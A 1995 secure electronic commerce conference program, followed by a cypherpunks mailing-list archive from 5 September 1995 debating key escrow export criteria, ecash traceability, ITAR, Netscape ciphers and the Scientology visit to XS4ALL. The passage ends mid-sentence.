8:00am - 4:50pm Sessions 6 - 10 ---------------------------------------------- TRACK - A AGREEMENTS, LEGISLATION, POLICY AND REGULATION ---------------------------------------------- Session 1 So Who's in Charge, Anyway? The Impact of National & Int'l Leadership & Initiatives in Secure EC SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor Sally Katzen, Office of Management and Budget Bruce McConnell, Office of Management & Budget Renaud Sorieul, Esq., UNCITRAL Session 2 Drafting Agreements for Secure Electronic Commerce SPEAKERS: Michael S Baum, Esq., Independent Monitoring Thomas J Smedinghoff, Esq., McBride Baker & Coles Joe Wackerman, Esq., United States Postal Service Session 3 Are Privacy Requirements Inhibiting Electronic Commerce? SPEAKERS: Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti Prof. George Trubow, The John Marshall Law School Ian Walden, Ph.D., Commission of the European Communities Session 4 Alternative Methods of Signing: Legal Aspects of the IRS's July 1995 Regulation SPEAKERS: Tom Baker, Esq.,Internal Revenue Service Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Session 5 Digital Signature Legislation and Electronic Commerce SPEAKERS: Alan Asay, Esq., Utah Department of Commerce Kirk W Dillard, Esq., State Senator, State of Illinois Dean Sutherland, State Senator, Washinton State William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature Session 6 The Legal Status and Effect of Digital Signatures - Perspectives SPEAKERS: Prof. Mads Andersen, University of Copenhagen Mario Miccoli, International Union of Latin Notaries Session 7 On-Line Registration vs. In-Person Registration: What Satisfies Business and Legal Requirements? SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Jeff Treuhaft, Netscape Communications Corporation Peter Williams, Verisign Session 8 Antitrust in Electronic Commerce: Shopping, Payments & Certification Authorities SPEAKERS: Prof. Mads Andersen, University of Copenhagen John Greanley, Esq., US Department of Justice, Antitrust Division Session 9 Proving Secure Computer-Based Transactions: Evidence Revisited SPEAKERS: Margaret A Berger, Brooklyn Law School Charles Nesson, Harvard Law School Ian Walden, Ph.D., Commission of the European Communities Session 10 Third Party Service Providers & Certification Authorities-Can They Successfully Limit their Liabilty SPEAKERS: Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Renaud Sorieul, Esq., UNCITRAL -------------------- TRACK - B INFORMATION SECURITY -------------------- Session 1 Requirements for Implementing Reasonable Security Procedures SPEAKERS: Robert Daniels, Esq., U.S. Social Security Administation Dain Gary, Morgan Stanley Allan M Shiffman, Terisa Systems, Inc. Session 2 Information Security Standards: Policy, Coordination & Interoperability SPEAKERS: Marty Ferris, US Department of Treasury Hoyt Kesterson II, Bull Worldwide Information Systems Peter Landrock, Ph.D., CRYPTOMATHIC David Solo, Bolt, Beranek and Newman Session 3 Who's Really on the Other End: Identification Technologies and Nonrepudiation SPEAKERS: Benjamin Miller, Personal Identification News John E Siedlarz, IriScan, Inc. William Sweet, National Semiconductor Session 4 Security and Security Policy in Internet-based Payments Systems SPEAKERS: Marty Ferris, US Department of Treasury Tim Jones, Mondex Anne Wallace, US Department of Treasury Session 5 When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce SPEAKERS: Prof. Michael Froomkin, University of Miami School of Law Jeff Greiveldinger, US Department of Justice, Criminal Div. Frank W Sudia, Bankers Trust Company Session 6 Comparing Critical Cryptographic Algorithms, Protocols, and Standards to Enable Secure Electronic Commerce SPEAKERS: Peter Landrock, Ph.D., CRYPTOMATHIC Ron Rivest, Massachusetts Institute of Technology Miles E Smid, National Institute of Standards & Tech. Session 7 Export Controls & Transborder Data Flows: Is Secure Electronic Commerce in Jeopardy? SPEAKERS: James Bidzos, RSA Data Security Renee H Danckwerth, Export Consultant Session 8 'Certificates-R-US': Trust Models and the Developing Secure Information Infrastructure SPEAKERS: Warwick Ford, Bell-Northern Research Sead Muftic, COST Computer Security Technologies Peter Williams, Verisign Session 9 Professional Accreditation and Certification - The New Frontier in 'Remote Trust' SPEAKERS: Richard C Koenig, Int'l Info. Sys. Security Cert. Consort. Alan M Schwartz, Esq., American Bar Association Session 10 Looking into the Crystal Ball: Certificates Revisited SPEAKERS: Web Augustine, VeriSign, Inc. Warwick Ford, Bell-Northern Research Hoyt Kesterson II, Bull Worldwide Information Systems ------------------------------------------- TRACK - C LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE ------------------------------------------- Session 1 Do Criminal Laws Really Protect Electronic Commerce? SPEAKERS: Scott Charney, Esq., US Department of Justice William J Cook, Brinks, et al. Richard A Ress, Federal Bureau of Investigation Session 2 Who Owns the Information, Standards, Certificates and Cryptographic Keys? SPEAKERS: Peter Harter, National Public Telecomputing Network David W Maher, Esq., Sonnenschein Nath & Rosenthal James Powers, Esq., Shulman, Rogers et. al Session 3 Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ray Nimmer, Esq., Weil, Gotshal & Manges Session 4 Electronic Licensing and Distribution of Digital Content: Downloading for Liability? SPEAKERS: James C McKay, Jr., Office of the Corporation Counsel, D.C. Thomas J Smedinghoff, Esq., McBride Baker & Coles Mark Traphagen, Software Publishers Association. Session 5 Insuring Electronic Commerce Transactions and Infrastructure SPEAKERS: Andrew Cockrane, Alexander & Alexander Norman R Nelson, New York Clearing House Association Session 6 Auditing a Third Party/Value Added Network or Certification Authority (and Its Implications) SPEAKERS: Charles H LeGrand, CIA, Institute of Internal Auditors John Stelzer, COMMERCE:Institute Session 7 Electronic Recordkeeping - What to Save, When and How to Save It, and for How Long SPEAKERS: Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Claude Perreault, Chambre des notaires du Quebec Session 8 Disaster and Contingency Planning Services: What is Needed for EC and Certification Authorities SPEAKERS: Dain Gary, Morgan Stanley Ake Nilson, Marinade Limited Helena Roine-Taylor, The Finnish Data Communication Assoc. FINPRO David Solo, Bolt, Beranek and Newman Session 9 General Counsel's Forum on Computer-Based Trade SPEAKERS: Robert W Barger, Esq., AT&T Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Session 10 An Audit Model for Your Electronic Commerce Infrastructure SPEAKERS: Gerald R Bielfeldt, NationsBank Phillip Oddo, Ciba-Geigy Horton Sorkin, Ph.D., Howard University ------------------------------ TRACK - D INFRASTRUCTURAL CONSIDERATIONS ------------------------------ Session 1 Securely Shopping on the Web: New Paradigms, Protocols and Opportunities SPEAKERS: Jeff Hilt, VISA International Todd Ostrander, Egghead Software Session 2 What can Trusted Third Parties and Certification Authorities Learn from the Financial Clearinghouses SPEAKERS: Carol Barrett, Federal Reserve Bank of New York Bill Nelson, National Automated Clearinghouse Associa Norman R Nelson, New York Clearing House Association Session 3 Electronically 'Gluing' Computer-based Records SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Allan M Shiffman, Terisa Systems, Inc. Session 4 Global Registries for Secure Electronic Commerce SPEAKERS: Jonathan Allen, Barum Computer Consultants Michel Peereman, Federation Nationale des Chambres Peter Robinson, US Council for International Business Session 5 Computer-based Negotiability: What is Needed to Make it Work SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor James E Byrne, James Mason University Law School Ake Nilson, Marinade Limited Session 6 Time/Date Stamping of Digital Information: Necessities & Options SPEAKERS: Richard Rothwell, United States Postal Service Scott Stornetta, Surety Technologies, Inc. Session 7 Will Healthcare-related Electronic Commerce Require Special Controls and Secure Infrastructures? SPEAKERS: Kathleen Frawley, J.D., M.S., R.R.A, AHIMA Daniel J O'Shea, National Computer Claims Service Session 8 The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm) SPEAKERS: Theodore S Barassi, Esq., US Council for International Business Mario Miccoli, International Union of Latin Notaries Session 9 Electronic Cash and Novel Electronic Commerce Payments Systems SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ron Rivest, Massachusetts Institute of Technology Marvin Sirbu, Carnegie-Mellon University Session 10 Why does Everyone Want to be a Trusted Third Party/Certification Authority (at Least Initially)? SPEAKERS: Sead Muftic, COST Computer Security Technologies Stratton D Sclavos, VeriSign, Inc. ----------------------------------------------------------------- TO REGISTER: ------------- Price: $550.00 (U.S.) Name: Title: First Name for Badge: Company/Organization: Address: City/State/Prov/Zip/Postal code: Country: Telephone: Fax: E-Mail: Check One: ========== [ ] I am Mailing a check in the amount of $______ [ ] I wish to charge this to a credit card (fax or mail only) [ ] American Express [ ] Visa [ ] MasterCard Card Number: Expiration Date: Name on Card: Signature (fax or mail): ----------------------------------------------------------------- HOTEL RESERVATIONS: A special conference rate of $129 has been arranged for our attendees. To make arrangements, please call the Hyatt Regency Bethesda at (301) 657-1234 Hyatt Regency Bethesda One Bethesda Metro Center Bethesda, MD 20814 ----------------------------------------------------------------- For more information or a complete program brochure and schedule, contact the conference coordinators as shown below: HOW TO CONTACT US ================= E-Mail: wec at multicorp.com Phone: (214) 516-4900 Fax: (214) 424-0562 Mail: Worldwide Electronic Commerce PO Box 743485 Dallas, TX 75374 =============================================== From shamrock at netcom.com Tue Sep 5 12:41:48 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 12:41:48 PDT Subject: Acceptable NIS&T restrictions Message-ID: At 17:20 9/4/95, Bill Stewart wrote: [...] >For Commercial Key Escrow, or commercial key-backup services, the criteria are >"whoever can be trusted to provide the services the customers want". >In this case, of course, the service most customers want is to be left alone, >or, failing that, to have the government's Master Key system provide minimal >risk >to the security of the actual transactions - 64 bit keys are not enough >security >for any high-valued financial transactions, though they may suffice for >credit cards. >One required characteristic would appear to be either sufficiently deep pockets >to collect judgements for violations of trust or a sufficiently high >reputation that >violations of trust are not expected. I seems obvious to me that prospective key escrow agents would be exempt from all liability for damages caused by releasing a key, exept in cases of gross negligence. Gross negligence being defined as giving a key to a person who explicitly states that they intend to use it for illegal purposes. -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Tue Sep 5 12:43:09 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 12:43:09 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: At 23:44 9/4/95, Black Unicorn wrote: [...] >3. The corruption of e-cash to further the above. > >If the government is disturbed by the laundering of money enough >to actually print, or even propose printing, two kinds of >currency, how will they respond to untraceable, unaccountable and >infinitely liquid e-cash? I think the answer is in past behavior: >e-cash will be linked to the four horsemen and subjected to >rigorous reporting requirements- systems which are true e-cash >will be banned. This is unnecessary, since there is no "true" ecash. DigiCash's ecash in its current form, the only version David Chaum is willing to licenese, is fully traceable. Popular Cypherpunk's myths nonwithstanding. First, the recipient of funds is non-anonymous by design. Second, any payer can trivialy make the recipient of a ecash note known by revealing the blinding factor. For purposed of lawenforcement, DigiCash's ecash in no more secure than if the (insert horseman here) billed his fees to a credit card. -- Lucky Green PGP encrypted mail preferred. From iagoldbe at csclub.uwaterloo.ca Tue Sep 5 12:46:19 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 5 Sep 95 12:46:19 PDT Subject: Wearing RSA shirt to school Message-ID: <199509051946.PAA03230@calum.csclub.uwaterloo.ca> OK, I'm confused. Is it or is it not legal to disclose cryptology to a foreigner? T.C.May (I think it was; sorry if I misremember this) posted a couple of days ago that it _was_ legal (citing that textbooks are not stopped from being published internationally). Perhaps this is just because the publishers of these texts never applied for an export license (maybe)? I was reading Bernstein vs. US Dept. of State, et al. (http://pgp.ai.mit.edu/~bal/legal/complaint-950221.html), and found this: G. RESULT OF DEFENDANTS' REJECTION OF PLAINTIFF'S CJ REQUEST 71. Plaintiff's scientific paper, algorithm and computer program are speech protected by the First Amendment to the United States Constitution. Thus, by rejecting Plaintiff's CJ Request, Defendants have determined that these items are "defense articles or defense services" which may not be exported without submitting to the above-described prior restraints. Since Defendants define "export" to include disclosing or transferring cryptology to a foreign person anywhere in the world, including within the United States, Plaintiff is informed and believes and therefore alleges that he is required by law to obtain a license to publish or publicly discuss any of the Items whether within or outside the United States. 72. Plaintiff is presently unable to publish his scientific paper, algorithm or computer program within or outside the United States. The only reason preventing publication is the threat of prosecution for an illegal export if he does so without a license. 73. To this date, Plaintiff has not received a response to his appeal or a license to publish his paper, algorithm, or computer program and as a result, he has not published the Items. So it seems to me (at least according to the Plaintiff (EFF, I guess)), that the ITAR regulations _do_ restrict publication and public discussion of cryptology. - Ian "and why is Canada considered part of the US for this?" From shamrock at netcom.com Tue Sep 5 13:38:05 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 13:38:05 PDT Subject: Emergency File Wipe Algorithim Message-ID: At 11:44 9/5/95, Andrew Loewenstern wrote: >Of course, you data must be worth quite a pretty penny for an attacker to >attempt to recover data from the oxides on the cells in your RAM. Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned that one should never underestimate the time and effort an opponent is willing to put into recovering your data? May I also point out that the rules of economics do not apply to the federal government, since it insits - quite successfully - on having a monoploy on using lethal force to extract arbitraily large amounts from hundreds of millions of working Americans? -- Lucky Green PGP encrypted mail preferred. From jsw at neon.netscape.com Tue Sep 5 13:45:08 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Tue, 5 Sep 95 13:45:08 PDT Subject: Non-US SSL128 site In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu> Message-ID: <42icqu$gst@tera.mcom.com> In article <9509051506.AA09665 at wombat.sware.com>, jeffb at sware.com (Jeff Barber) writes: > Adam Shostack writes: > > > | Netscape sells a 128-bit US-only client for $39 > > > Does the US only server also do des, 3des and IDEA, or just > > rc4-128? > > Yes. It does: > > RC4 - 128 > RC4 - 40 > RC2 - 128 > RC2 - 40 > IDEA > DES, "64 bits" > DES "with EDE 3, 192 bits" Our software does not implement idea at this time. It is in the SSL spec, as a possible cypher choice. We do implement the rest, including DES and 3DES. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jim at rand.org Tue Sep 5 13:54:02 1995 From: jim at rand.org (Jim Gillogly) Date: Tue, 5 Sep 95 13:54:02 PDT Subject: Another Son of Clipper discussion paper Message-ID: <199509052053.NAA01226@mycroft.rand.org> I sent along two discussion papers for tomorrow's NIST session on the revised plans for GAK last week. Here's the third. Jim Gillogly Hevensday, 14 Halimath S.R. 1995, 20:49 ----------------------------------------------------------------------------- Key Escrow Issues Meeting, September 6-7, 1995 Discussion Paper #3 Export Criteria Discussion Draft -- 64-bit Software Key Escrow Encryption As discussed at the SPA/AEA meeting on August 17, 1995, the Administration is willing to allow the export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. On the same date, the September 6-7 key escrow issues meeting at NIST was also announced. The two principal topics at the meeting will be: discussion of issues of exportability of 64-bit software key escrow encryption and 2) desirable characteristics for key escrow agents. In order to help make most productive use of the limited time available at the upcoming meeting and to better focus deliberation, the following criteria are being distributed for discussion purposes. Since it is important that final criteria be clear, straightforward, consistent, and implementable, please review these draft criteria and be prepared to discuss how they may be refined and made more specific. --- Draft Export Criteria --- for Software Key Escrow Encryption Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption. 1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits. 2. The product shall be designed to prevent multiple encryption (e.g., triple-DES). 3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10. 4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message. 5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block). 6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled. 7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information. 8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access. 9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10. 10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements. Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations. - - - Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents. Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e- mail: carlton at micf.nist.gov. 9/1/95 ----------------------------------------------------------------------------- From cman at communities.com Tue Sep 5 13:57:43 1995 From: cman at communities.com (Douglas Barnes) Date: Tue, 5 Sep 95 13:57:43 PDT Subject: approx of bignum^rational Message-ID: Does anyone have a good method for approximating bignums raised rational exponents in the interval [0,1]? Thanks, Douglas Barnes Electric Communities From anon-remailer at utopia.hacktic.nl Tue Sep 5 14:06:19 1995 From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request) Date: Tue, 5 Sep 95 14:06:19 PDT Subject: SSLRef (SSLtelnet) In-Reply-To: <199509050417.VAA05211@jobe.shell.portal.com> Message-ID: <199509051940.VAA26244@utopia.hacktic.nl> Hal (hfinney at shell.portal.com) wrote: >I understand that Netscape's browser will also accept certificates >created by a Netscape-internal "test" CA. I hoped that perhaps some >junk certificates from that CA might be floating around, ones which >would be useless for conventional purposes because their secret keys >are exposed, but which would be perfect for my needs. Is it possible that since this was only a "test" CA, that netscape used less than a full-strength key? If it was only 512 bits or so, we could try cracking it. From announce at xs4all.nl Tue Sep 5 14:10:25 1995 From: announce at xs4all.nl (announce) Date: Tue, 5 Sep 95 14:10:25 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <199509052109.AA16923@xs1.xs4all.nl> From: XS4ALL Internet Postbus 22864 1100 DJ Amsterdam tel: +31 20 6222885 fax: +31 20 6222753 PRESS RELEASE ------------- Police and members of Scientology church enter offices of XS4ALL ================================================================ Amsterdam - thuesday september 5, 1995. Today at about 14:00, XS4ALL was visited by Mr. S. Braan, bailiff. He was acting on behalf of the Religious Technology Centre, better known as the Scientology Church, or Scientology for short. He was assisted by a local police officer and Mr. Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology in The Netherlands. Also present were two computer experts (Mr. Ootjes and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and two American employees of Scientology, Mr. Weightman and Ms. Jenssen. Scientology is filing for seizure of XS4ALL's computer equipment. Under dutch law, this means that a bailiff comes in to record your assets. In real-life, the computer-experts that were present have recorded the types and serial numbers of all the computers in our offices. They did not take any equipment, the continuity of XS4ALL's services is not in jeopardy. What is this all about? ----------------------- The Scientology Church claims that the XS4ALL anonymous remailer was used to disseminate documents over the Internet to which the church holds the legal copyright. This has led the church to ask the president of the district court of Amsterdam to grant permission for this seizure as a prelude to legal procedures concerning damages suffered by the church. The remailer in question has been disabled more than 2 months ago. During the visit of Scientology to XS4ALL this afternoon, the remailer was not the subject of any conversation. The organisation seemed totally preoccupied with the information about Scientology that one of our users has put on his home page. Part of this information is said to be a file to which Scientology holds the copyright. If we were to delete the file in question on the spot, they were willing to drop the seizure. Responsability of Internet Providers ------------------------------------ XS4ALL categorically denies any responsability for contents of users' homepages. The users decide for themselves what is on their homepage. Since XS4ALL does not edit the homepages and has no mechanism of control over the contents we strongly feel that the users themselves are responsible for what they say on their homepage. This whole affair demonstrates the need for clarity concerning the legal postion of Internet Providers. We are shocked that our offices can be invaded bij freshly flown-in U.S. cult members. If we as Internet providers are held responsible for what our users say, that will undoubtebly kill freedom of speech on the net. Scare-tactics ------------- XS4ALL is not alone in receiving this kind of attention from Scientology. Scientology, a semi-religious multinational, is at war with a number of people on the Internet. A non-organized group of people on the net has started to openly discuss the activities of the church. Until recently, the church has always managed to supress critical voices by means of sheer intimidation and by engaging in endless legal battle. One of the people that Scientology has a problem with is 'fonss', an XS4ALL user that publishes the F.A.C.T.-net Kit on his home page (http://www.xs4all.nl/~fonss). This kit (which can be found on numerous homepages all over the Internet) consists of a large number of documents that show the true face of Scientology. One of these documents is a piece to which Scientology supposedly holds the copyright and which has been added to the kit without the church's permission. Additional information can be found on the Internet: http://www.cybercom.net/~rnewman/scientology/home.html http://www.xs4all.nl/~fonss news:alt.religion.scientology news:alt.censorship news:alt.clearing.technology From unicorn at access.digex.net Tue Sep 5 14:11:36 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 5 Sep 95 14:11:36 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) In-Reply-To: Message-ID: On Tue, 5 Sep 1995, Lucky Green wrote: > Date: Tue, 5 Sep 1995 12:45:44 -0800 > From: Lucky Green > To: Black Unicorn , cypherpunks at toad.com > Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment) > > At 23:44 9/4/95, Black Unicorn wrote: > [...] > > >3. The corruption of e-cash to further the above. > > > >If the government is disturbed by the laundering of money enough > >to actually print, or even propose printing, two kinds of > >currency, how will they respond to untraceable, unaccountable and > >infinitely liquid e-cash? I think the answer is in past behavior: > >e-cash will be linked to the four horsemen and subjected to > >rigorous reporting requirements- systems which are true e-cash > >will be banned. > > This is unnecessary, since there is no "true" ecash. DigiCash's ecash in > its current form, the only version David Chaum is willing to licenese, is > fully traceable. Popular Cypherpunk's myths nonwithstanding. Perhaps true, but this assumes that the Chaum method is the only method, which I believe to be incorrect. Perhaps I should use the term "future e-cash models" or "True Digital Cash." Currently there is no "true" e-cash implemented (as far as I know), but this is part of the problem. The product introduced to the public, the original market release will be (is) traceable, why should the public expect anything different? In addition this is exactly what I was talking about in deterring the use of "real" e-cash. Real e-cash will be seen as an anomoly, a perversion of e-cash to make it sneaky for the four horsemen (or that's how I would play it to the public were I a statist). > > First, the recipient of funds is non-anonymous by design. Second, any payer > can trivialy make the recipient of a ecash note known by revealing the > blinding factor. For purposed of lawenforcement, DigiCash's ecash in no > more secure than if the (insert horseman here) billed his fees to a credit > card. > Again, one more reason that "real" e-cash will be banned. The public doesn't need it as an alternative is widely available. This is the curse (or gift) of crippleware- its use as a diversion. See also, Clipper > -- Lucky Green > PGP encrypted mail preferred. --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From andrew_loewenstern at il.us.swissbank.com Tue Sep 5 14:21:26 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 5 Sep 95 14:21:26 PDT Subject: Emergency File Wipe Algorithim Message-ID: <9509052120.AA02633@ch1d157nwk> Lucky Green writes: > Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned > that one should never underestimate the time and effort an opponent > is willing to put into recovering your data? > > May I also point out that the rules of economics do not apply to > the federal government, since it insits - quite successfully - on > having a monoploy on using lethal force to extract arbitraily large > amounts from hundreds of millions of working Americans? As always, Rubber Hose Cryptanalysis(*tm, patent pending) is usually the cheapest way to go...if you're a federal government. But not all threats are that serious. For instance, I have no fears that the admins here would grovel over the oxides on RAM cells in order to determine the pass-phrase of my PGP key if they suspected me of doing something naughty (even if they knew this was possible, which is unlikely). You can get really paranoid about security and rightly so if your opponent is a federal government. However, pushing key-material bits around RAM in order to prevent them from being burned into the chips is probably going to do you little good if, for instance, a hardware keystroke monitor is surreptitiously installed in your keyboard (which is likely far cheaper and easier than analysing RAM chips and maybe even disk platters). BTW, this is not a troll and I know that the possible constitutionality of court-ordered disclosure of passphrases or key-material has been hashed over many times in the past here, but have any cases with this particular attribute gone through court yet? There were reports even years ago of pedophiles and other agents of the Four Horsemen using PGP to encrypt diaries and such, have any of these cases gone to court yet and did the prosecution attempt to force the defendant to reveal a passphrase?? andrew (wonders how many readers will take their keyboards apart to look for radio transmitters) From m5 at dev.tivoli.com Tue Sep 5 14:37:28 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Tue, 5 Sep 95 14:37:28 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: <199509052053.NAA01226@mycroft.rand.org> Message-ID: <9509052136.AA11617@alpha> This is really interesting to me: Jim Gillogly forwards: > Key Escrow Issues Meeting, September 6-7, 1995 > Discussion Paper #3 > > Export Criteria Discussion Draft -- > 64-bit Software Key Escrow Encryption > . . . > --- Draft Export Criteria --- > for Software Key Escrow Encryption > > Software key escrow encryption products meeting the following > criteria will be granted special export licensing... > > 1. The product will use an unclassified encryption algorithm > (e.g., DES, RC4) with a key length not to exceed 64 bits. Ok, sounds good... but what I don't understand is further on: > 5. The product shall be resistant to any alteration that would > disable or circumvent the key escrow mechanism, to include > being designed so that the key escrow mechanism cannot be > disabled by a static patch, (i.e., the replacement of a > block of code by a modified block). [ that I can understand ] > 6. The product shall not decrypt messages or files encrypted by > non-escrowed products, including products whose key escrow > mechanisms have been altered or disabled. This is where I start scratching my head. I mean, how exactly will the software be able to tell that what's being fed into it came from a Good version versus an Evil version of the cryptosystem? Isn't that very issue the reason for Skipjack being (A) secret and (B) kept on a supposedly auto-desctruct chip? If the algorithm is public (and to stretch a point, if the executable makes it onto somebody's hard disk, it's effectively public), I don't really understand how the above can be made a realistic goal. I'd always thought that the idea behind software key escrow was that it'd be stuck into most "name-brand" tools, so that Joe Lazy AOL User wouldn't bother (or wouldn't know how) to circumvent it. (Still seems kinda ridiculous, but maybe that's just me.) Anyway, this document makes it seem like somebody seriously expects this is doable. If it is, then I *really* want to know how (because I'd like to exploit that sort of technology myself...). > 7. The key escrow mechanism allows access to a user's encrypted > information regardless of whether that user is the sender or > the intended recipient of the encrypted information. Ooh. > 8. The key escrow mechanism shall not require repeated > involvement by the escrow agents for the recovery of > multiple decryption keys during the period of authorized > access. Hmm... > 9. In the event any such product is or may be available in the > United States, each production copy of the software shall > either have a unique key required for decrypting messages or > files that is escrowed in accordance with #10, Well there go the manufacturing costs up through the roof... > or have the > capability for its escrow mechanism to be rekeyed and any > new key to be escrowed in accordance with #10. I guess that'd work with the somewhat weak mechanisms used with "unlockable" CD-ROM stuff. > 10. The product shall accept escrow of its key(s) only with > escrow agents certified by the U.S. Government or by foreign > governments with which the U.S. Government has formal > agreements consistent with U.S. law enforcement and national > security requirements. Again, how can it tell? Maybe I'm just being dense. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From shamrock at netcom.com Tue Sep 5 14:48:13 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 14:48:13 PDT Subject: Emergency File Wipe Algorithim Message-ID: At 16:20 9/5/95, Andrew Loewenstern wrote: [...] >andrew >(wonders how many readers will take their keyboards apart to look for radio >transmitters) Been there. Done that. Hmm, come to think of it, it's about time for another check. -- Lucky Green PGP encrypted mail preferred. From jim at rand.org Tue Sep 5 15:04:59 1995 From: jim at rand.org (Jim Gillogly) Date: Tue, 5 Sep 95 15:04:59 PDT Subject: Son of Clipper (commentary) Message-ID: <199509052204.PAA01423@mycroft.rand.org> I didn't want to mix my comments with the recent discussion paper I sent along, so here they are separately. Please refer back to my last msg to see the points I'm bitching about. It's a depressingly restrictive list of things to require for software escrow encryption. I can only conclude that they're not serious. Clipper itself fails to meet many of them, including (I think) #1, #2, #5, and #6. Rumor has it that Clipper does not meet #9 either -- at Crypto '95 somebody in the Key Escrow session said many government Clipper keys are not escrowed, and somebody in the back spoke up and said he owned such a chip. By the way, Moti Yung (noted crypto guy at IBM Yorktown Heights) presented more breaks in Clipper's protocols like those Matt Blaze found, and pointed out some aspects of Matt's break that he thinks make it more important than previously thought. Other things that bother me about the list: #1: If it's escrowed, there should be no need to limit the key length unless somebody's planning to cheat. #3: This rules out the possibility of escrowing individual session keys to limit the access of LE to sessions they are entitled by law to intercept. #5: Care to tell us how to create software that can't be patched? This is one that's been played in the marketplace and has lost. The battle between copy protectors and crackers has been decided in favor of the crackers: legitimate users largely refuse to buy packages that are too messy to deal with (e.g. they leave hidden files all over the disk, which may interfere with backups or other programs) or that use special purpose hardware (e.g. dongles that eat up a printer port). This one's a loser, I think. #6: This is clearly a research issue. Several speakers (even pro-GAK) at Crypto '95 said the policy decisions are being made before the research has been done. The protocols and system specifications are key here, and it's not obvious how this criterion can be met. It's not obviously impossible, but it certainly hasn't been solved in Clipper. #7: One of the Crypto '95 attacks on the Clipper protocol makes use of this misfeature of Clipper. It allows a broadening of the net of captured keys so that many more unauthorized messages may be read. #8: See #3 above -- let's wait on the policy decision until we have a policy debate. A mandated compromise is an oxymoron. I (for one) would prefer to see much more limited keys (like session keys) if Congress decides that the right to 